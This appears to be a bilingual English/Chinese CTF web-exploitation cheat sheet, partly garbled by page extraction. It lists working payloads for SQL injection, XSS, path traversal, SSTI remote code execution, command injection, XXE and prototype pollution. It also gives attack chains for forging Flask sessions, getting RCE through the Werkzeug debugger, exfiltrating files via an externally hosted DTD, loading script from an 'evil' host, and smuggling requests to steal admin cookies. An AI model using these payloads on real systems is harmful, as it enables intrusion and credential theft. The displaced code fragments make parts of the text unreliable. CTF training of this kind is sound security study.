ctf-web
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseCTF Web Exploitation
CTF Web漏洞利用
Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.
Web CTF挑战速查手册。每种技术在此处都有一行简要说明;如需包含payload和代码的完整细节,请查看配套文件。
Additional Resources
额外资源
- server-side.md - Server-side attacks: SQLi, SSTI, SSRF, XXE, command injection, code injection (Ruby/Perl/Python), ReDoS, file write→RCE, eval bypass
- client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements
- auth-and-access.md - Auth/authz attacks: JWT, session, password inference, weak validation, client-side gates, NoSQL auth bypass
- node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE
- web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, Foundry tooling
- cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass
- server-side.md - 服务端攻击:SQLi、SSTI、SSRF、XXE、命令注入、代码注入(Ruby/Perl/Python)、ReDoS、文件写入→RCE、eval绕过
- client-side.md - 客户端攻击:XSS、CSRF、CSPT、缓存投毒、DOM技巧、React填充输入、隐藏元素
- auth-and-access.md - 认证/授权攻击:JWT、会话、密码推断、弱验证、客户端网关、NoSQL认证绕过
- node-and-prototype.md - Node.js相关:原型污染、VM沙箱逃逸、Happy-DOM链、flatnest CVE
- web3.md - 区块链/Web3相关:Solidity漏洞利用、代理模式、ABI编码技巧、Foundry工具使用
- cves.md - 特定CVE漏洞利用:Next.js中间件绕过、curl凭证泄露、Uvicorn CRLF、urllib协议绕过
Reconnaissance
侦察
- View source for HTML comments, check JS/CSS files for internal APIs
- Look for source map files
.map - Check response headers for custom X- headers and auth hints
- Common paths: ,
/robots.txt,/sitemap.xml,/.well-known/,/admin,/api,/debug,/.git//.env - Search JS bundles: for hidden endpoints
grep -oE '"/api/[^"]+"' - Check for client-side validation that can be bypassed
- Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)
- 查看页面源码寻找HTML注释,检查JS/CSS文件中的内部API
- 查找源映射文件
.map - 检查响应头中的自定义X-开头头部和认证提示
- 常见路径:、
/robots.txt、/sitemap.xml、/.well-known/、/admin、/api、/debug、/.git//.env - 搜索JS包:使用查找隐藏端点
grep -oE '"/api/[^"]+"' - 检查可绕过的客户端验证
- 对比UI发送的内容与API接受的内容(读取JS包获取所有字段)
SQL Injection Quick Reference
SQL注入速查
Detection: Send — syntax error indicates SQLi
'' OR '1'='1 # Classic auth bypass
' OR 1=1-- # Comment termination
username=\&password= OR 1=1-- # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master-- # SQLite schema
0x6d656f77 # Hex encoding for 'meow' (bypass quotes)See server-side.md for second-order SQLi, LIKE brute-force, SQLi→SSTI chains.
检测方法: 发送 —— 若返回语法错误则存在SQLi
'' OR '1'='1 # 经典认证绕过
' OR 1=1-- # 注释终止
username=\&password= OR 1=1-- # 反斜杠转义引号绕过
' UNION SELECT sql,2,3 FROM sqlite_master-- # SQLite数据库结构
0x6d656f77 # 'meow'的十六进制编码(绕过引号过滤)如需二阶SQLi、LIKE暴力破解、SQLi→SSTI链等内容,请查看server-side.md。
XSS Quick Reference
XSS速查
html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>Filter bypass: hex , entities , case mixing , event handlers.
\x3cscript\x3e<script><ScRiPt>See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.
html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>过滤绕过方法:十六进制、实体编码、大小写混合、事件处理器。
\x3cscript\x3e<script><ScRiPt>如需DOMPurify绕过、缓存投毒、CSPT、React输入技巧等内容,请查看client-side.md。
Path Traversal / LFI Quick Reference
路径遍历 / LFI速查
../../../etc/passwd
....//....//....//etc/passwd # Filter bypass
..%2f..%2f..%2fetc/passwd # URL encoding
%252e%252e%252f # Double URL encoding
{.}{.}/flag.txt # Brace stripping bypassPython footgun: returns
os.path.join('/app/public', '/etc/passwd')/etc/passwd../../../etc/passwd
....//....//....//etc/passwd # 过滤绕过
..%2f..%2f..%2fetc/passwd # URL编码
%252e%252e%252f # 双重URL编码
{.}{.}/flag.txt # 大括号剥离绕过Python陷阱: 会返回
os.path.join('/app/public', '/etc/passwd')/etc/passwdJWT Quick Reference
JWT速查
- — remove signature entirely
alg: none - Algorithm confusion (RS256→HS256) — sign with public key
- Weak secret — brute force with hashcat/flask-unsign
- Key exposure — check ,
/api/getPublicKey,.env/debug/config - Balance replay — save JWT, spend, replay old JWT, return items for profit
See auth-and-access.md for full JWT attacks and session manipulation.
- —— 完全移除签名
alg: none - 算法混淆(RS256→HS256)—— 使用公钥签名
- 弱密钥 —— 使用hashcat/flask-unsign暴力破解
- 密钥泄露 —— 检查、
/api/getPublicKey、.env/debug/config - 余额重放 —— 保存JWT,消费后重放旧JWT,退回物品获利
如需完整的JWT攻击与会话操纵内容,请查看auth-and-access.md。
SSTI Quick Reference
SSTI速查
Detection: returns
{{7*7}}49python
undefined检测方法: 返回则存在SSTI
{{7*7}}49python
undefinedJinja2 RCE
Jinja2远程代码执行
{{self.init.globals.builtins.import('os').popen('id').read()}}
{{self.init.globals.builtins.import('os').popen('id').read()}}
Go template
Go模板
{{.ReadFile "/flag.txt"}}
{{.ReadFile "/flag.txt"}}
EJS
EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
undefined<%- global.process.mainModule.require('child_process').execSync('id') %>
undefinedSSRF Quick Reference
SSRF速查
127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html
127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001针对TOCTOU的DNS重绑定:https://lock.cmpxchg8b.com/rebinder.html
Command Injection Quick Reference
命令注入速查
bash
; id | id `id` $(id)
%0aid # Newline 127.0.0.1%0acat /flagWhen cat/head blocked: , ,
sed -n p flag.txtawk '{print}'tac flag.txtbash
; id | id `id` $(id)
%0aid # 换行符 127.0.0.1%0acat /flag当cat/head被禁用时:、、
sed -n p flag.txtawk '{print}'tac flag.txtXXE Quick Reference
XXE速查
xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>PHP filter:
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>PHP过滤器:
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">Code Injection Quick Reference
代码注入速查
Ruby : Break string + comment:
Perl : 2-arg open allows pipe:
JS blocklist bypass:
PHP deserialization: Craft serialized object in cookie → LFI/RCE
instance_evalVALID');INJECTED_CODE#open()|command|evalrow['con'+'structor']['con'+'structor']('return this')()See server-side.md for full payloads and bypass techniques.
Ruby : 拆分字符串+注释:
Perl : 双参数open允许管道:
JS 黑名单绕过:
PHP反序列化: 在Cookie中构造序列化对象 → LFI/RCE
instance_evalVALID');INJECTED_CODE#open()|command|evalrow['con'+'structor']['con'+'structor']('return this')()如需完整的payload与绕过技巧,请查看server-side.md。
Node.js Quick Reference
Node.js速查
Prototype pollution: or flatnest circular ref bypass
VM escape: → RCE
Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE
{"__proto__": {"isAdmin": true}}this.constructor.constructor("return process")()Prototype pollution permission bypass (Server OC, Pragyan 2026):
bash
undefined原型污染: 或flatnest循环引用绕过
VM逃逸: → RCE
完整利用链: 原型污染 → 在Happy-DOM中启用JS eval → VM逃逸 → RCE
{"__proto__": {"isAdmin": true}}this.constructor.constructor("return process")()原型污染权限绕过(Server OC, Pragyan 2026):
bash
undefinedWhen Express.js endpoint checks req.body.isAdmin or similar:
当Express.js端点检查req.body.isAdmin或类似字段时:
curl -X POST -H 'Content-Type: application/json'
-d '{"Path":"value","proto":{"isAdmin":true}}'
'https://target/endpoint'
-d '{"Path":"value","proto":{"isAdmin":true}}'
'https://target/endpoint'
curl -X POST -H 'Content-Type: application/json'
-d '{"Path":"value","proto":{"isAdmin":true}}'
'https://target/endpoint'
-d '{"Path":"value","proto":{"isAdmin":true}}'
'https://target/endpoint'
proto pollutes Object.prototype, making isAdmin truthy on all objects
__proto__会污染Object.prototype,使所有对象的isAdmin值为真
**Key insight:** Always try `__proto__` injection on JSON endpoints, even when the vulnerability seems like something else (race condition, SSRF, etc.).
See [node-and-prototype.md](node-and-prototype.md) for detailed exploitation.**关键提示:** 即使看起来是其他漏洞(竞态条件、SSRF等),也要尝试在JSON端点注入`__proto__`。
如需详细利用方法,请查看[node-and-prototype.md](node-and-prototype.md)。Auth & Access Control Quick Reference
认证与访问控制速查
- Cookie manipulation: ,
role=adminisAdmin=true - Host header bypass:
Host: 127.0.0.1 - Hidden endpoints: search JS bundles for ,
/api/internal//api/admin/ - Client-side gates: or call API directly
window.overrideAccess = true - Password inference: profile data + structured ID format → brute-force
- Weak signature: check if only first N chars of hash are validated
See auth-and-access.md for full patterns.
- Cookie操纵:、
role=adminisAdmin=true - Host头绕过:
Host: 127.0.0.1 - 隐藏端点:在JS包中搜索、
/api/internal//api/admin/ - 客户端网关:设置或直接调用API
window.overrideAccess = true - 密码推断:结合个人资料数据+结构化ID格式 → 暴力破解
- 弱签名:检查是否仅验证哈希的前N个字符
如需完整模式,请查看auth-and-access.md。
File Upload → RCE
文件上传 → RCE
- upload:
.htaccess+ webshellAddType application/x-httpd-php .lol - Gogs symlink: overwrite with
.git/configRCEcore.sshCommand - Python hijack: write malicious shared object + delete
.soto force reimport.pyc - ZipSlip: symlink in zip for file read, path traversal for file write
- Log poisoning: PHP payload in User-Agent + path traversal to include log
See server-side.md for detailed steps.
- 上传:
.htaccess+ webshellAddType application/x-httpd-php .lol - Gogs符号链接:用覆盖
core.sshCommand实现RCE.git/config - Python 劫持:写入恶意共享对象 + 删除
.so强制重新导入.pyc - ZipSlip:压缩包中的符号链接用于文件读取,路径遍历用于文件写入
- 日志投毒:在User-Agent中插入PHP payload + 路径遍历包含日志文件
如需详细步骤,请查看server-side.md。
Multi-Stage Chain Patterns
多阶段利用链模式
0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → write via path traversal → RCE
/proc/1/environ.soKey chaining insights:
- Path traversal + any file-reading primitive → leak ,
/proc/*/environ/proc/*/cmdline - CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
- Arbitrary file write in Python → hijacking or
.sooverwrite for RCE.pyc - Lowercased response body → use hex escapes (for
\x3c)<
0xClinic利用链: 密码推断 → 路径遍历 + ReDoS oracle(从泄露密钥)→ CRLF注入(CSP绕过 + 缓存投毒 + XSS)→ urllib协议绕过(SSRF)→ 路径遍历写入文件 → RCE
/proc/1/environ.so关键利用链提示:
- 路径遍历 + 任意文件读取能力 → 泄露、
/proc/*/environ/proc/*/cmdline - 头中的CRLF → 一次性实现CSP绕过 + 缓存投毒 + XSS
- Python中的任意文件写入 → 劫持或覆盖
.so实现RCE.pyc - 响应体小写 → 使用十六进制转义(如表示
\x3c)<
Useful Tools
实用工具
bash
sqlmap -u "http://target/?id=1" --dbs # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt # Directory fuzzing
flask-unsign --decode --cookie "eyJ..." # JWT decode
hashcat -m 16500 jwt.txt wordlist.txt # JWT crack
dalfox url http://target/?q=test # XSSbash
sqlmap -u "http://target/?id=1" --dbs # SQLi工具
ffuf -u http://target/FUZZ -w wordlist.txt # 目录模糊测试
flask-unsign --decode --cookie "eyJ..." # JWT解码
hashcat -m 16500 jwt.txt wordlist.txt # JWT破解
dalfox url http://target/?q=test # XSS工具Flask/Werkzeug Debug Mode Exploitation
Flask/Werkzeug调试模式漏洞利用
Pattern (Meowy, Nullcon 2026): Flask app with Werkzeug debugger enabled + weak session secret.
Attack chain:
- Session secret brute-force: When secret is generated from weak RNG (e.g., library, short strings):
random_wordbashflask-unsign --unsign --cookie "eyJ..." --wordlist wordlist.txt # Or brute-force programmatically: for word in wordlist: try: data = decode_flask_cookie(cookie, word) print(f"Secret: {word}, Data: {data}") except: pass - Forge admin session: Once secret is known, forge :
is_admin=Truebashflask-unsign --sign --cookie '{"is_admin": true}' --secret "found_secret" - SSRF via pycurl: If endpoint uses pycurl, target
/fetchhttp://127.0.0.1/admin/flag - Header bypass: Some endpoints check or similar custom headers — include in SSRF request
X-Fetcher
Werkzeug debugger RCE: If is accessible, generate PIN:
/console- Read ,
/proc/self/environ,/sys/class/net/eth0/address/proc/sys/kernel/random/boot_id - Compute PIN using Werkzeug's algorithm
- Execute arbitrary Python in debugger console
模式(Meowy, Nullcon 2026): 启用Werkzeug调试器的Flask应用 + 弱会话密钥。
攻击链:
- 会话密钥暴力破解: 当密钥由弱随机数生成器生成时(如库、短字符串):
random_wordbashflask-unsign --unsign --cookie "eyJ..." --wordlist wordlist.txt # 或通过编程方式暴力破解: for word in wordlist: try: data = decode_flask_cookie(cookie, word) print(f"密钥: {word}, 数据: {data}") except: pass - 伪造管理员会话: 获取密钥后,伪造:
is_admin=Truebashflask-unsign --sign --cookie '{"is_admin": true}' --secret "found_secret" - 通过pycurl实现SSRF: 如果端点使用pycurl,目标地址设为
/fetchhttp://127.0.0.1/admin/flag - 头绕过: 部分端点会检查或类似自定义头 —— 在SSRF请求中包含该头
X-Fetcher
Werkzeug调试器RCE: 如果可访问,生成PIN码:
/console- 读取、
/proc/self/environ、/sys/class/net/eth0/address/proc/sys/kernel/random/boot_id - 使用Werkzeug的算法计算PIN码
- 在调试器控制台执行任意Python代码
XXE with External DTD Filter Bypass
绕过外部DTD过滤的XXE
Pattern (PDFile, PascalCTF 2026): Upload endpoint filters keywords ("file", "flag", "etc") in uploaded XML, but external DTD fetched via HTTP is NOT filtered.
Technique: Host malicious DTD on webhook.site or attacker server:
xml
<!-- Remote DTD (hosted on webhook.site) -->
<!ENTITY % data SYSTEM "file:///app/flag.txt">
<!ENTITY leak "%data;">xml
<!-- Uploaded XML (clean, passes filter) -->
<?xml version="1.0"?>
<!DOCTYPE book SYSTEM "http://webhook.site/TOKEN">
<book><title>&leak;</title></book>Key insight: XML parser fetches and processes external DTD without applying the upload keyword filter. Response includes flag in parsed field.
Setup with webhook.site API:
python
import requests
TOKEN = requests.post("https://webhook.site/token").json()["uuid"]
dtd = '<!ENTITY % d SYSTEM "file:///app/flag.txt"><!ENTITY leak "%d;">'
requests.put(f"https://webhook.site/token/{TOKEN}/request/...",
json={"default_content": dtd, "default_content_type": "text/xml"})模式(PDFile, PascalCTF 2026): 上传端点会过滤上传XML中的关键词("file"、"flag"、"etc"),但通过HTTP获取的外部DTD不会被过滤。
技巧: 在webhook.site或攻击者服务器托管恶意DTD:
xml
<!-- 远程DTD(托管在webhook.site) -->
<!ENTITY % data SYSTEM "file:///app/flag.txt">
<!ENTITY leak "%data;">xml
<!-- 上传的XML(内容干净,可通过过滤) -->
<?xml version="1.0"?>
<!DOCTYPE book SYSTEM "http://webhook.site/TOKEN">
<book><title>&leak;</title></book>关键提示: XML解析器会获取并处理外部DTD,而不会应用上传时的关键词过滤。响应中的解析字段会包含flag。
使用webhook.site API设置:
python
import requests
TOKEN = requests.post("https://webhook.site/token").json()["uuid"]
dtd = '<!ENTITY % d SYSTEM "file:///app/flag.txt"><!ENTITY leak "%d;">'
requests.put(f"https://webhook.site/token/{TOKEN}/request/...",
json={"default_content": dtd, "default_content_type": "text/xml"})JSFuck Decoding
JSFuck解码
Pattern (JShit, PascalCTF 2026): Page source contains JSFuck ( only). Decode by removing trailing and calling in Node.js:
[]()!+()().toString()javascript
const code = fs.readFileSync('jsfuck.js', 'utf8');
// Remove last () to get function object instead of executing
const func = eval(code.slice(0, -2));
console.log(func.toString()); // Reveals original code with hardcoded flag模式(JShit, PascalCTF 2026): 页面源码包含JSFuck(仅使用)。通过移除末尾的并在Node.js中调用解码:
[]()!+()().toString()javascript
const code = fs.readFileSync('jsfuck.js', 'utf8');
// 移除最后一个()以获取函数对象而非执行
const func = eval(code.slice(0, -2));
console.log(func.toString()); // 显示包含硬编码flag的原始代码Shadow DOM XSS (Pragyan 2026)
Shadow DOM XSS (Pragyan 2026)
Closed Shadow DOM exfiltration: Wrap in a Proxy to capture shadow root references:
attachShadowjavascript
var _r, _o = Element.prototype.attachShadow;
Element.prototype.attachShadow = new Proxy(_o, {
apply: (t, a, b) => { _r = Reflect.apply(t, a, b); return _r; }
});
// After target script creates shadow DOM, _r contains the rootIndirect eval scope escape: escapes scope restrictions.
(0,eval)('code')with(document)Payload smuggling via avatar URL: Encode full JS payload in avatar URL after fixed prefix, extract with :
avatar.slice(N)html
<svg/onload=(0,eval)('eval(avatar.slice(24))')></script></script><script src=//evil>document.scripts[].textContent封闭Shadow DOM数据窃取: 用Proxy包装以捕获shadow root引用:
attachShadowjavascript
var _r, _o = Element.prototype.attachShadow;
Element.prototype.attachShadow = new Proxy(_o, {
apply: (t, a, b) => { _r = Reflect.apply(t, a, b); return _r; }
});
// 目标脚本创建shadow DOM后,_r将包含其根节点间接eval作用域逃逸: 可绕过作用域限制。
(0,eval)('code')with(document)通过头像URL走私payload: 在固定前缀后将完整JS payload编码到头像URL中,使用提取:
avatar.slice(N)html
<svg/onload=(0,eval)('eval(avatar.slice(24))')></script></script><script src=//evil>document.scripts[].textContentDOM Clobbering + MIME Mismatch (Pragyan 2026)
DOM Clobbering + MIME类型不匹配 (Pragyan 2026)
MIME type confusion: CDN/server checks for but not → serves as → HTML in JPEG polyglot executes as page.
.jpeg.jpg.jpgtext/htmlForm-based DOM clobbering:
html
<form id="config"><input name="canAdminVerify" value="1"></form>
<!-- Makes window.config.canAdminVerify truthy, bypassing JS checks -->MIME类型混淆: CDN/服务器检查但不检查 → 将以类型返回 → JPEG多态文件中的HTML会作为页面执行。
.jpeg.jpg.jpgtext/html基于表单的DOM Clobbering:
html
<form id="config"><input name="canAdminVerify" value="1"></form>
<!-- 使window.config.canAdminVerify为真,绕过JS检查 -->HTTP Request Smuggling via Cache Proxy (Pragyan 2026)
缓存代理导致的HTTP请求走私 (Pragyan 2026)
Cache proxy desync: When a caching TCP proxy returns cached responses without consuming request bodies, leftover bytes are parsed as the next request.
Cookie theft pattern:
- Create cached resource (e.g., blog post)
- Send request with cached URL + appended incomplete POST (large Content-Length, partial body)
- Cache proxy returns cached response, doesn't consume POST body
- Admin bot's next request bytes fill the POST body → stored on server
- Read stored request to extract admin's cookies
python
inner_req = (
f"POST /create HTTP/1.1\r\n"
f"Host: {HOST}\r\n"
f"Cookie: session={user_session}\r\n"
f"Content-Length: 256\r\n" # Large, but only partial body sent
f"\r\n"
f"content=LEAK_" # Victim's request completes this
)
outer_req = (
f"GET /cached-page HTTP/1.1\r\n"
f"Content-Length: {len(inner_req)}\r\n"
f"\r\n"
).encode() + inner_req缓存代理不同步: 当缓存TCP代理在未消费请求体的情况下返回缓存响应时,剩余字节会被解析为下一个请求。
Cookie窃取模式:
- 创建缓存资源(如博客文章)
- 发送包含缓存URL + 附加不完整POST请求的请求(大Content-Length,部分请求体)
- 缓存代理返回缓存响应,不消费POST请求体
- 管理员机器人的下一个请求字节会填充POST请求体 → 存储在服务器上
- 读取存储的请求以提取管理员的Cookie
python
inner_req = (
f"POST /create HTTP/1.1\r\n"
f"Host: {HOST}\r\n"
f"Cookie: session={user_session}\r\n"
f"Content-Length: 256\r\n" # 长度较大,但仅发送部分请求体
f"\r\n"
f"content=LEAK_" # 受害者的请求会补全该内容
)
outer_req = (
f"GET /cached-page HTTP/1.1\r\n"
f"Content-Length: {len(inner_req)}\r\n"
f"\r\n"
).encode() + inner_reqPath Traversal: URL-Encoded Slash Bypass (Pragyan 2026)
路径遍历:URL编码斜杠绕过 (Pragyan 2026)
%2f%2fbash
curl 'https://target/public%2f../nginx.conf'%2f%2fbash
curl 'https://target/public%2f../nginx.conf'Nginx sees "/public%2f../nginx.conf" → matches /public/ route
Nginx识别为"/public%2f../nginx.conf" → 匹配/public/路由
Filesystem resolves to /public/../nginx.conf → /nginx.conf
文件系统解析为/public/../nginx.conf → /nginx.conf
**Also try:** `%2e` for dots, double encoding `%252f`, backslash `\` on Windows.**还可尝试:** `%2e`代替点,双重编码`%252f`,Windows系统使用反斜杠`\`。Common Flag Locations
常见Flag位置
/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes/flag.txt, /flag, /app/flag.txt, /home/*/flag*
环境变量:/proc/self/environ
数据库:flag、flags、secret表
响应头:x-flag、x-archive-tag、x-proof
隐藏DOM:display:none元素、data属性